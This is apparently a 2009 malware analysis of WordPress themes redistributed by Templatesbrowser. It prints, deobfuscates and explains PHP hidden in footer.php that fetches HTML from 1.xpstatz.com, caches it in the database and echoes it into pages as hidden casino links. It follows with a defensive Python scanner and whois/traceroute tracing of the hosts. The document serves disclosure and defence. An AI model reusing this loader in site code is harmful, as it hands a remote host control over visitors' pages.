In May 2007, we (Wessel and Onno Zweers) discovered that themes downloaded from Templatesbrowser contained PHP code that produced hidden links to commercial websites such as casinos, obviously meant to increase the Google PageRank of those websites. We wrote about it in several places.
After some publicity (in Digg and the Joomla forum, among others) the webmaster of Templatesbrowser gave up. A domain speculator bought the site, it seemed, and the themes disappeared.
In July 2009, Wessel discovered that the old themes were back. This time with “improved” malicious code.
On July 15th, several of the involved casino websites were taken offline, no doubt because of this analysis page. Also, the hidden links to casino websites seem to have been removed.
Latest news and developments: http://twitter.com/onnix
I downloaded the theme Aalglatt, both from Templatesbrowser and from the original author, Felix Krusch. We unpacked both into different directories and used the Unix tool diff to display the differences.
onno@parga:~/analysis$ diff aalglatt-felixkrusch aalglatt-templatesbrowser
diff aalglatt-felixkrusch/footer.php aalglatt-templatesbrowser/footer.php
4c4
< <p>Aalglatt Template by <a href="http://www.felixkrusch.com">Felix Krusch</a> based on The Green Marinée template by <a href="http://e-lusion.com" title="Ian Main - e-lusion.com">Ian Main</a></p>
---
> <p>Aalglatt Template by <a href="http://www.felixkrusch.com">Felix Krusch</a></p>
10c10
< <li><a href="http://wordpress.org/" title="Powered by the lovely WordPress">WP</a></li>
---
> <?php global $wpdb; $RC97967EF8C0BC5E1AD94C597A5D83875 = $wpdb->get_col("SELECT option_value FROM $wpdb->options WHERE option_name='l_time_code'"); $RC69F19E4BCF2765EDB4274B852436F44 = $wpdb->get_col("SELECT option_value FROM $wpdb->options WHERE option_name='l_code'"); if (empty($RC97967EF8C0BC5E1AD94C597A5D83875)) { $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('l_time_code', '0', 'no')"); $R76DA5BA68AA0171088C9E2EE1409AC19 = 0; } else $R76DA5BA68AA0171088C9E2EE1409AC19 = intval($RC97967EF8C0BC5E1AD94C597A5D83875[0]); if (empty($RC69F19E4BCF2765EDB4274B852436F44)) { $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('l_code', '<br/>', 'no')"); $RE11FF1AFCAD5E0BC6B9BB3DE41CA9EAB = '<br/>'; } else $RE11FF1AFCAD5E0BC6B9BB3DE41CA9EAB = $RC69F19E4BCF2765EDB4274B852436F44[0]; if ( ( time() - $R76DA5BA68AA0171088C9E2EE1409AC19 ) >= 60 ) { $R39C188653EA53DBD6E3F1D3915EDAC0C = "com"; $R8088818E3E46A17C12F2EE42EB12D7AC = "1."; $R7B934F06258B8BA3608E30CDE9EA1035 = "xpstatz"; $RAD8CC24399FEA84D3454DD7057C38FD0 = "xps."; $RBF7582359E6813BD7C54DD76E7505037 = "$R8088818E3E46A17C12F2EE42EB12D7AC$R7B934F06258B8BA3608E30CDE9EA1035.$R39C188653EA53DBD6E3F1D3915EDAC0C"; $RA81C90DCC503F6900F7DC424AD04F525 = "/".$RAD8CC24399FEA84D3454DD7057C38FD0."php?h=" . urlencode($_SERVER['HTTP_HOST']) . "&u=" . urlencode($_SERVER['REQUEST_URI']); if (ini_get('allow_url_fopen')) { $RE11FF1AFCAD5E0BC6B9BB3DE41CA9EAB = @file_get_contents("http://" . $RBF7582359E6813BD7C54DD76E7505037 . 
$RA81C90DCC503F6900F7DC424AD04F525); } else { $RF500F4A848E2EB2F8AAC3A6734D7EC38 = @fsockopen($RBF7582359E6813BD7C54DD76E7505037, '80', $R87844B1C6FC922407E6020B6B224950F, $R1966719AEC0096F98BA934D649A6E28D, 30); if ($RF500F4A848E2EB2F8AAC3A6734D7EC38) { @stream_set_timeout($RF500F4A848E2EB2F8AAC3A6734D7EC38, 60); @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "GET $RA81C90DCC503F6900F7DC424AD04F525 HTTP/1.1\r\n"); @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "Host: $RBF7582359E6813BD7C54DD76E7505037\r\n"); @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "Connection: Close\r\n\r\n"); $RE11FF1AFCAD5E0BC6B9BB3DE41CA9EAB = ""; while(!feof($RF500F4A848E2EB2F8AAC3A6734D7EC38)) { $RE11FF1AFCAD5E0BC6B9BB3DE41CA9EAB .= @fgets($RF500F4A848E2EB2F8AAC3A6734D7EC38, 1024); } $RE11FF1AFCAD5E0BC6B9BB3DE41CA9EAB = trim(strstr($RE11FF1AFCAD5E0BC6B9BB3DE41CA9EAB, "\r\n\r\n")); } @fclose($RF500F4A848E2EB2F8AAC3A6734D7EC38); } if ( strpos($RE11FF1AFCAD5E0BC6B9BB3DE41CA9EAB, '[/]') ) { $R76DA5BA68AA0171088C9E2EE1409AC19 = time(); $R54997E66281827CBC285597040554FCC = mysql_escape_string($RE11FF1AFCAD5E0BC6B9BB3DE41CA9EAB); $wpdb->query("UPDATE $wpdb->options SET option_value=$R76DA5BA68AA0171088C9E2EE1409AC19 WHERE option_name='l_time_code'"); $wpdb->query("UPDATE $wpdb->options SET option_value='$R54997E66281827CBC285597040554FCC' WHERE option_name='l_code'"); } } if ( strpos($RE11FF1AFCAD5E0BC6B9BB3DE41CA9EAB, '[/]') ) { $R3CB9CDAED257453CFA56B9EF81B44C57 = strpos($RE11FF1AFCAD5E0BC6B9BB3DE41CA9EAB, '[]') + 2; $R24D59CD0B76A27B85F35D40A3CF6EC37 = strrpos($RE11FF1AFCAD5E0BC6B9BB3DE41CA9EAB, '[/]'); echo substr($RE11FF1AFCAD5E0BC6B9BB3DE41CA9EAB, $R3CB9CDAED257453CFA56B9EF81B44C57, $R24D59CD0B76A27B85F35D40A3CF6EC37-$R3CB9CDAED257453CFA56B9EF81B44C57); $RE762F29BDD39FF0A2ADF9AF4E6885799 = 1; } ?>
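Review bot: the block that replaces the WP link echoes a slice of whatever 1.xpstatz.com returns straight into the footer, with no escaping or validation beyond looking for the '[]' and '[/]' markers, so the remote host controls the page's HTML. It also stores that string in wp_options under 'l_code' with a timestamp in 'l_time_code' and only re-fetches when the stored timestamp is at least 60 seconds old, which is why the injected content keeps being served after the remote host is gone. Every network call is wrapped in @, so a failing fetch leaves nothing in the PHP error log.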
19c19
< <?php do_action('wp_footer', ''); ?>
---
> <?php xfooter(); do_action('wp_footer', ''); ?>
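Review bot: xfooter() is called here but is defined nowhere in this diff; the only place it can come from is the functions.php that exists only in the Templatesbrowser copy (the "Only in" line below), which this comparison does not open. A cleanup that only reverts footer.php therefore leaves a second, unexamined part of the payload in place; functions.php should be diffed against a clean theme or removed as well.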
Only in aalglatt-templatesbrowser: functions.php
Common subdirectories: aalglatt-felixkrusch/images and aalglatt-templatesbrowser/images
diff aalglatt-felixkrusch/sidebar.php aalglatt-templatesbrowser/sidebar.php
65,66d64
< <li><a href="feed:<?php bloginfo('rss2_url'); ?>" title="<?php _e('Syndicate this site using RSS'); ?>"><?php _e('<abbr title="Really Simple Syndication">RSS</abbr>'); ?></a></li>
< <li><a href="feed:<?php bloginfo('comments_rss2_url'); ?>" title="<?php _e('The latest comments to all posts in RSS'); ?>"><?php _e('Comments <abbr title="Really Simple Syndication">RSS</abbr>'); ?></a></li>
Now, that was pretty unreadable. But from all this output, we can draw some conclusions:
- in footer.php, the credit to Ian Main's Green Marinée template has been removed;
- in footer.php, the link to wordpress.org has been replaced by a long block of PHP with deliberately unreadable variable names;
- footer.php now calls a function xfooter() that the original does not call;
- the Templatesbrowser version contains an extra file, functions.php;
- in sidebar.php, the two RSS links have been removed.
To make the code more readable, we apply a few search & replace commands:
sed -i -e 's/R39C188653EA53DBD6E3F1D3915EDAC0C/com/g' *.php
sed -i -e 's/R7B934F06258B8BA3608E30CDE9EA1035/xpstatz/g' *.php
sed -i -e 's/RAD8CC24399FEA84D3454DD7057C38FD0/xps/g' *.php
sed -i -e 's/R8088818E3E46A17C12F2EE42EB12D7AC/one/g' *.php
sed -i -e 's/RA81C90DCC503F6900F7DC424AD04F525/path/g' *.php
sed -i -e 's/RBF7582359E6813BD7C54DD76E7505037/domain/g' *.php
sed -i -e 's/RC97967EF8C0BC5E1AD94C597A5D83875/databaseresult1/g' *.php
sed -i -e 's/RC69F19E4BCF2765EDB4274B852436F44/databaseresult2/g' *.php
sed -i -e 's/R76DA5BA68AA0171088C9E2EE1409AC19/zero/g' *.php
sed -i -e 's/RE11FF1AFCAD5E0BC6B9BB3DE41CA9EAB/html_tag_br/g' *.php
sed -i -e 's/RF500F4A848E2EB2F8AAC3A6734D7EC38/socket/g' *.php
sed -i -e 's/R87844B1C6FC922407E6020B6B224950F/novalue1/g' *.php
sed -i -e 's/R1966719AEC0096F98BA934D649A6E28D/novalue2/g' *.php
sed -i -e 's/html_tag_br/some_downloaded_file_contents/g' *.php
sed -i -e 's/R54997E66281827CBC285597040554FCC/string_for_database/g' *.php
sed -i -e 's/RE762F29BDD39FF0A2ADF9AF4E6885799/another_one/g' *.php
sed -i -e 's/R24D59CD0B76A27B85F35D40A3CF6EC37/position_of_slash/g' *.php
sed -i -e 's/R3CB9CDAED257453CFA56B9EF81B44C57/position_of_brackets/g' *.php
sed -i -e 's/RDAFE7FE4FDC52E2D1048573B4DB1DF18/databaseresult1/g' *.php
sed -i -e 's/R41CCFE75D7AC2B4681397CFC70BAEF40/databaseresult2/g' *.php
sed -i -e 's/R14AF1BE9EE26A90921E64A82E7836797/one/g' *.php
sed -i -e 's/RBDCA893A9385C089DC5F358AAA52C09B/zero/g' *.php
sed -i -e 's/R5F38CE9C0B222F3BB0880E016DC07527/zero_or_one/g' *.php
sed -i -e 's/RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1/html_tag_br/g' *.php
sed -i -e 's/html_tag_br/some_downloaded_file_contents/g' *.php
sed -i -e 's/R9446905AFC32B438C0BD070AD05F3D83/string_for_database/g' *.php
After tidying up the layout a bit, we get:
<?php
global $wpdb;
$databaseresult1 = $wpdb->get_col("SELECT option_value FROM $wpdb->options WHERE option_name='l_time_code'");
$databaseresult2 = $wpdb->get_col("SELECT option_value FROM $wpdb->options WHERE option_name='l_code'");
if (empty($databaseresult1)) {
    $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('l_time_code', '0', 'no')");
    $zero = 0;
} else
    $zero = intval($databaseresult1[0]);
if (empty($databaseresult2)) {
    $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('l_code', '<br/>', 'no')");
    $some_downloaded_file_contents = '<br/>';
} else
    $some_downloaded_file_contents = $databaseresult2[0];
if ( ( time() - $zero ) >= 60 ) {
    $com = "com";
    $one = "1.";
    $xpstatz = "xpstatz";
    $xps = "xps.";
    $domain = "$one$xpstatz.$com";
    $path = "/".$xps."php?h=" . urlencode($_SERVER['HTTP_HOST']) . "&u=" . urlencode($_SERVER['REQUEST_URI']);
    if (ini_get('allow_url_fopen')) {
        $some_downloaded_file_contents = @file_get_contents("http://" . $domain . $path);
    } else {
        $socket = @fsockopen($domain, '80', $novalue1, $novalue2, 30);
        if ($socket) {
            @stream_set_timeout($socket, 60);
            @fwrite($socket, "GET $path HTTP/1.1\r\n");
            @fwrite($socket, "Host: $domain\r\n");
            @fwrite($socket, "Connection: Close\r\n\r\n");
            $some_downloaded_file_contents = "";
            while(!feof($socket)) {
                $some_downloaded_file_contents .= @fgets($socket, 1024);
            }
            $some_downloaded_file_contents = trim(strstr($some_downloaded_file_contents, "\r\n\r\n"));
        }
        @fclose($socket);
    }
    if ( strpos($some_downloaded_file_contents, '[/]') ) {
        $zero = time();
        $string_for_database = mysql_escape_string($some_downloaded_file_contents);
        $wpdb->query("UPDATE $wpdb->options SET option_value=$zero WHERE option_name='l_time_code'");
        $wpdb->query("UPDATE $wpdb->options SET option_value='$string_for_database' WHERE option_name='l_code'");
    }
}
if ( strpos($some_downloaded_file_contents, '[/]') ) {
    $position_of_brackets = strpos($some_downloaded_file_contents, '[]') + 2;
    $position_of_slash = strrpos($some_downloaded_file_contents, '[/]');
    echo substr($some_downloaded_file_contents, $position_of_brackets, $position_of_slash-$position_of_brackets);
    $another_one = 1;
}
?>
So, what does this code do? Basically the same as Templatesbrowser’s code a few years ago: it downloads some info from a certain server, 1.xpstatz.com:
$some_downloaded_file_contents = @file_get_contents("http://" . $domain . $path);
and displays it:
echo substr($some_downloaded_file_contents,...).
What is new is that it works around a blocked PHP feature: if the setting that lets file_get_contents() open URLs is switched off, it takes another route:
if (ini_get('allow_url_fopen'))...
by opening a network socket and writing to and reading from that socket. The result is the same.
Also new: the collected string is stored in the WordPress database as an option named “l_code”. If this code can’t connect to 1.xpstatz.com fast enough, the string from the database is used instead. So this works like a cache.
$string_for_database = mysql_escape_string($some_downloaded_file_contents);
[...]
$wpdb->query("UPDATE $wpdb->options SET option_value='$string_for_database' WHERE option_name='l_code'");
So, couldn’t this just be some kind of statistics service or pageview counter?
Two years ago, we discovered that Templatesbrowser’s themes had links to casinos. So I did a search:
http://www.google.com/search?q=%22Aalglatt+Template+by+Felix+Krusch%22+casino
Among the first results are quite a few sites that actually write about casinos or have normal advertisements to casinos. But on the second page I found this link:
http://www.whatfredread.com/2008/06/maybe-the-appendix-is-useful-after-all/
And in the HTML source of that page I found this hidden link:
<div style="display: none;" id="11365798"><a href="http://www.bonnomori.com/">casino en ligne</a></div>
On another page I found a similar link:
<div style="display: none;" id="12090942"><a href="http://www.competitivechallenge.com/">casinos en ligne</a></div>
Here is a list of domains that the hidden links point to:
bonnomori.com
competitivechallenge.com
desmoinesarearealtor.net
joe2006.com
At least two of those sites link to femalegamblers.org.
If you use this template from Templatesbrowser, the person behind Templatesbrowser has control over what is displayed on your WordPress website. Your website might contain link spam to casino websites; if Google finds the link spam, you risk being dropped from its search engine result pages. He or she may even put malicious code on your website that infects the operating system of your visitors with viruses and other malware.
Because of the caching mechanism, shutting down or blocking 1.xpstatz.com is not enough; your website will still contain link spam.
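As an added example, not part of the original analysis, the Python below turns the two defender-relevant points above into a small triage script: it flags theme files that use the $R<32 hex digits> variable naming, fetch remote content and echo it, or touch the l_code/l_time_code options, and it decodes a cached l_code value the same way the footer code does, so a cleanup can see which hidden links a site is still serving from its own database. The theme sources and the cached value fed to it are constructed; example.invalid is a placeholder, not a real host.

```python
import re

# Indicators taken from the footer.php analysed above. The PHP sources and
# the cached option value used as input below are constructed for this
# example; example.invalid is a placeholder, not a real host.
OBFUSCATED_VAR = re.compile(r'\$R[0-9A-F]{32}\b')
REMOTE_FETCH = re.compile(r'\b(file_get_contents|fsockopen)\s*\(')
OPTION_NAMES = re.compile(r"option_name\s*=\s*'(l_code|l_time_code)'")
HIDDEN_LINK = re.compile(
    r'<div[^>]*display:\s*none[^>]*>.*?<a\s+href="([^"]+)"', re.I | re.S)


def scan_theme_file(source):
    """Return the indicator names found in one PHP theme file (in order)."""
    hits = []
    # The real sample uses dozens of $R<md5-like> names; three occurrences
    # are enough to tell generated names from a hand-written theme.
    if len(OBFUSCATED_VAR.findall(source)) >= 3:
        hits.append('obfuscated-variables')
    # Fetching remote content and echoing it is the actual injection path.
    if REMOTE_FETCH.search(source) and re.search(r'\becho\b', source):
        hits.append('remote-fetch-and-echo')
    # The cache lives in wp_options under these two names.
    if OPTION_NAMES.search(source):
        hits.append('l_code-options')
    return hits


def scan_theme(files):
    """files: {filename: source}; returns only the files with indicators."""
    report = {}
    for name, source in files.items():
        hits = scan_theme_file(source)
        if hits:
            report[name] = hits
    return report


def extract_payload(cached):
    """Mirror the footer code's parsing of the cached l_code value: the text
    between the first '[]' and the last '[/]' is what gets echoed.
    Returns '' when the markers are missing; the footer displays nothing then."""
    start = cached.find('[]')
    end = cached.rfind('[/]')
    if start == -1 or end == -1 or end <= start:
        return ''
    return cached[start + 2:end]


def hidden_link_targets(html):
    """Hosts linked from display:none containers in an echoed fragment."""
    return [re.sub(r'^https?://([^/]+).*$', r'\1', href)
            for href in HIDDEN_LINK.findall(html)]


# Constructed sample inputs.
SAMPLE_FOOTER = r'''<?php global $wpdb;
$R0123456789ABCDEF0123456789ABCDEF = $wpdb->get_col("SELECT option_value FROM $wpdb->options WHERE option_name='l_code'");
$RFEDCBA9876543210FEDCBA9876543210 = @file_get_contents("http://example.invalid/x.php");
echo $RFEDCBA9876543210FEDCBA9876543210; ?>'''
SAMPLE_SIDEBAR = '<li><a href="http://wordpress.org/" title="Powered by WordPress">WP</a></li>'
SAMPLE_CACHED = ('[]<div style="display: none;" id="11365798">'
                 '<a href="http://www.bonnomori.com/">casino en ligne</a></div>[/]')

if __name__ == '__main__':
    print(scan_theme({'footer.php': SAMPLE_FOOTER, 'sidebar.php': SAMPLE_SIDEBAR}))
    print(hidden_link_targets(extract_payload(SAMPLE_CACHED)))
```

On a live site the same two functions apply to the theme directory and to the value of SELECT option_value FROM wp_options WHERE option_name='l_code'.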
Let’s have a look at the whois database:
onno@parga:~$ whois templatesbrowser.com
Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

   Domain Name: TEMPLATESBROWSER.COM
   Registrar: ENOM, INC.
   Whois Server: whois.enom.com
   Referral URL: http://www.enom.com
   Name Server: DNS1.NAME-SERVICES.COM
   Name Server: DNS2.NAME-SERVICES.COM
   Name Server: DNS3.NAME-SERVICES.COM
   Name Server: DNS4.NAME-SERVICES.COM
   Name Server: DNS5.NAME-SERVICES.COM
   Status: clientTransferProhibited
   Updated Date: 30-jan-2009
   Creation Date: 01-mar-2007
   Expiration Date: 01-mar-2010

>>> Last update of whois database: Thu, 09 Jul 2009 19:59:55 UTC <<<

Registration Service Provided By: NameCheap.com
Contact: support@NameCheap.com
Visit: http://www.namecheap.com/

Domain name: templatesbrowser.com

Registrant Contact:
   WhoisGuard
   WhoisGuard Protected ()
   Fax:
   8939 S. Sepulveda Blvd. #110 - 732
   Westchester, CA 90045
   US

Administrative Contact:
   WhoisGuard
   WhoisGuard Protected (0ec15b4fc07e492e9e99d6b70e9bd05d.protect@whoisguard.com)
   +1.6613102107
   Fax: +1.6613102107
   8939 S. Sepulveda Blvd. #110 - 732
   Westchester, CA 90045
   US

Technical Contact:
   WhoisGuard
   WhoisGuard Protected (0ec15b4fc07e492e9e99d6b70e9bd05d.protect@whoisguard.com)
   +1.6613102107
   Fax: +1.6613102107
   8939 S. Sepulveda Blvd. #110 - 732
   Westchester, CA 90045
   US

Status: Locked

Name Servers:
   dns1.name-services.com
   dns2.name-services.com
   dns3.name-services.com
   dns4.name-services.com
   dns5.name-services.com

Creation date: 01 Mar 2007 15:54:31
Expiration date: 01 Mar 2010 15:54:31
The identity of the domain owner is hidden by the WhoisGuard service.
Let’s see who owns the IP address. That will give us a clue about the hosting provider.
onno@parga:~$ host templatesbrowser.com
templatesbrowser.com has address 74.53.139.140
templatesbrowser.com mail is handled by 5 eforwardct2.name-services.com.
templatesbrowser.com mail is handled by 5 eforwardct.name-services.com.
onno@parga:~$ host 74.53.139.140
140.139.53.74.in-addr.arpa domain name pointer 8c.8b.354a.static.theplanet.com.
So, what do we have?
- templatesbrowser.com is registered through Enom, Inc. (registration service provided by NameCheap.com), and the registrant hides behind WhoisGuard;
- its name servers are dns1 through dns5.name-services.com;
- it is hosted at 74.53.139.140, a static address of theplanet.com (The Planet).
Then, there is the server that the malicious code tries to read content from.
onno@parga:~$ host xpstatz.com
xpstatz.com has address 209.249.222.18
xpstatz.com mail is handled by 20 eforward1.registrar-servers.com.
xpstatz.com mail is handled by 10 eforward2.registrar-servers.com.
onno@parga:~$ host 209.249.222.18
Host 18.222.249.209.in-addr.arpa. not found: 3(NXDOMAIN)
That address does not have a reverse DNS entry, so it is more difficult to find out whom it belongs to. So, we try a traceroute:
onno@parga:~$ traceroute 209.249.222.18
traceroute to 209.249.222.18 (209.249.222.18), 30 hops max, 60 byte packets
[...]
 6  k701.pni-xs4all.ams1.nl.above.net (62.93.194.145)  30.123 ms  15.912 ms  16.148 ms
 7  ge-3-1-0.mpr1.ams1.nl.above.net (64.125.25.13)  17.758 ms  19.393 ms  19.909 ms
 8  so-2-1-0.mpr1.lga5.us.above.net (64.125.27.185)  106.523 ms  107.893 ms  108.931 ms
 9  so-1-1-0.mpr1.ord2.us.above.net (64.125.27.169)  134.579 ms  136.402 ms  138.620 ms
10  3.252.66.gigeservers.net (66.252.3.90)  136.673 ms  139.099 ms  139.333 ms
11  209.249.222.18 (209.249.222.18)  139.732 ms  141.498 ms  141.952 ms
So, the closest lead seems to be gigeservers.net. Judging from their home page, they are a hosting company.
And now let’s have a look at the advertisers. Who are those casino websites that try to get a higher Google pagerank?
onno@parga:~$ whois competitivechallenge.com
Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

   Domain Name: COMPETITIVECHALLENGE.COM
   Registrar: ENOM, INC.
   Whois Server: whois.enom.com
   Referral URL: http://www.enom.com
   Name Server: NS1.SEOMORON.COM
   Name Server: NS2.SEOMORON.COM
   Status: clientTransferProhibited
   Updated Date: 09-mar-2009
   Creation Date: 08-dec-2005
   Expiration Date: 08-dec-2009

>>> Last update of whois database: Tue, 14 Jul 2009 20:55:23 UTC <<<
That was very brief. Competitivechallenge.com does not have a reverse DNS entry, so we do a traceroute.
onno@parga:~$ traceroute competitivechallenge.com
traceroute to competitivechallenge.com (66.154.20.253), 30 hops max, 60 byte packets
[...]
14  ae-71-71.ebr1.Washington1.Level3.net (4.69.134.133)  119.167 ms ae-91-91.ebr1.Washington1.Level3.net (4.69.134.141)  120.775 ms ae-61-61.ebr1.Washington1.Level3.net (4.69.134.129)  119.963 ms
15  ae-2.ebr3.Atlanta2.Level3.net (4.69.132.85)  128.490 ms  131.160 ms  164.957 ms
16  ae-22-52.car2.Atlanta1.Level3.net (4.68.103.35)  163.519 ms  164.343 ms  165.761 ms
17  REVELATION.car2.Atlanta1.Level3.net (4.71.22.22)  164.613 ms  160.036 ms  158.652 ms
18  atl1-cust2.112.globalcompass.com (69.61.56.206)  152.455 ms  151.399 ms  151.636 ms
19  66.154.20.253 (66.154.20.253)  141.000 ms  139.071 ms  124.399 ms
The closest domain name, globalcompass.com, is indeed a hosting company.
onno@parga:~$ whois bonnomori.com
Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

   Domain Name: BONNOMORI.COM
   Registrar: ENOM, INC.
   Whois Server: whois.enom.com
   Referral URL: http://www.enom.com
   Name Server: NS1.SEOMAPPED.COM
   Name Server: NS2.SEOMAPPED.COM
   Status: clientTransferProhibited
   Updated Date: 09-mar-2009
   Creation Date: 22-oct-2006
   Expiration Date: 22-oct-2009

>>> Last update of whois database: Tue, 14 Jul 2009 21:03:34 UTC <<<
The Whois info is again very brief, but there is a recurring name here: enom.com, which is also the registrar of the Templatesbrowser.com domain.
Let’s now see who the hosting provider is.
onno@parga:~$ host bonnomori.com
bonnomori.com has address 66.154.64.167
bonnomori.com mail is handled by 0 bonnomori.com.
onno@parga:~$ host 66.154.64.167
167.64.154.66.in-addr.arpa domain name pointer 66-154-64-167.seomapped.com.
So, the IP address belongs to seomapped.com.
How about femalegamblers.org?
onno@parga:~$ host femalegamblers.org
femalegamblers.org has address 69.64.155.176
femalegamblers.org mail is handled by 5 eforwardct2.name-services.com.
femalegamblers.org mail is handled by 5 eforwardct.name-services.com.
onno@parga:~$ host 69.64.155.176
;; connection timed out; no servers could be reached
No reverse DNS, so we do a traceroute again.
onno@parga:~$ traceroute 69.64.155.176
traceroute to 69.64.155.176 (69.64.155.176), 30 hops max, 60 byte packets
[...]
10  xe-0-2-0.er1.sjc2.us.above.net (64.125.25.6)  191.698 ms  193.564 ms  194.035 ms
11  xe-1-1-0.mpr3.sjc7.us.above.net (64.125.27.89)  217.501 ms  218.870 ms  219.325 ms
12  64.124.195.245.available.above.net (64.124.195.245)  266.948 ms  267.803 ms  270.783 ms
13  sjl01dr01-1-po1.demandmedia.net (69.64.152.54)  271.077 ms  179.325 ms  182.391 ms
14  69.64.155.176 (69.64.155.176)  184.853 ms  185.074 ms  185.334 ms
Now, that’s interesting. This website seems to be hosted at a company called demandmedia.net. Judging from their website, they are into internet marketing. And well, look at that: one of their products is called Enom.com. Where did we see that name before? Right, it is the registrar of both Templatesbrowser.com and the advertisement server xpstatz.com!
One more lookup: name-services.com runs the name servers of Templatesbrowser.com. Who are they? Again, the registrar is Enom.com.
onno@parga:~$ whois name-services.com
Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

   Domain Name: NAME-SERVICES.COM
   Registrar: ENOM, INC.
   Whois Server: whois.enom.com
   Referral URL: http://www.enom.com
   Name Server: DNS1.NAME-SERVICES.COM
   Name Server: DNS2.NAME-SERVICES.COM
   Name Server: DNS3.NAME-SERVICES.COM
   Name Server: DNS4.NAME-SERVICES.COM
   Name Server: DNS5.NAME-SERVICES.COM
   Status: clientTransferProhibited
   Updated Date: 27-sep-2007
   Creation Date: 11-jun-2001
   Expiration Date: 11-jun-2010
We do a traceroute, and guess what we find?
onno@parga:~$ traceroute NAME-SERVICES.COM
traceroute to NAME-SERVICES.COM (69.64.155.124), 30 hops max, 60 byte packets
[...]
10  xe-0-2-0.er1.sjc2.us.above.net (64.125.25.6)  197.288 ms  197.703 ms  198.629 ms
11  xe-1-1-0.mpr3.sjc7.us.above.net (64.125.27.89)  200.167 ms  200.591 ms  202.486 ms
12  64.124.195.245.available.above.net (64.124.195.245)  181.126 ms  178.030 ms  180.346 ms
13  69.64.152.54 (69.64.152.54)  183.100 ms  179.060 ms  181.546 ms
14  69.64.155.124 (69.64.155.124)  184.037 ms  184.299 ms  184.657 ms
onno@parga:~$ host 69.64.152.54
54.152.64.69.in-addr.arpa domain name pointer sjl01dr01-1-po1.demandmedia.net.
So, name-services.com is only one hop away from demandmedia.net!
Demandmedia.net is involved in three ways:
- femalegamblers.org, the site that at least two of the casino domains link to, sits one hop behind a demandmedia.net router;
- Enom.com, one of Demand Media’s products, is the registrar of Templatesbrowser.com, of xpstatz.com and of the casino domains;
- name-services.com, which runs the name servers of Templatesbrowser.com, is also one hop away from demandmedia.net.
Still, hosting and registration are all innocent things. The only one doing evil things here is Templatesbrowser, and we still don’t know who they are.
Since we don’t yet know the identity of the person behind Templatesbrowser, our options are limited: complain to the hosting providers and warn Google.
On July 10, 2009, I sent emails to the involved hosting providers asking them to shut down templatesbrowser.com and xpstatz.com. The Planet responded twice that they are looking into the matter.
On July 15, 2009, I submitted a spam report to Google.
Also on July 15, some of the involved casino websites were removed from DNS. Of the casino sites, only femalegamblers.org is still online, and there is no direct link to it.
On July 19, I noticed that the hidden links on whatfredread.com had disappeared.
Even if templatesbrowser.com and xpstatz.com are shut down, the websites that use the malicious themes may still contain link spam because of the caching mechanism. The affected WordPress sites can be tracked down by searching Google for links to the casino websites. Another option would be to take control of xpstatz.com and have it serve an innocent but easily trackable string, possibly containing a warning to the webmaster.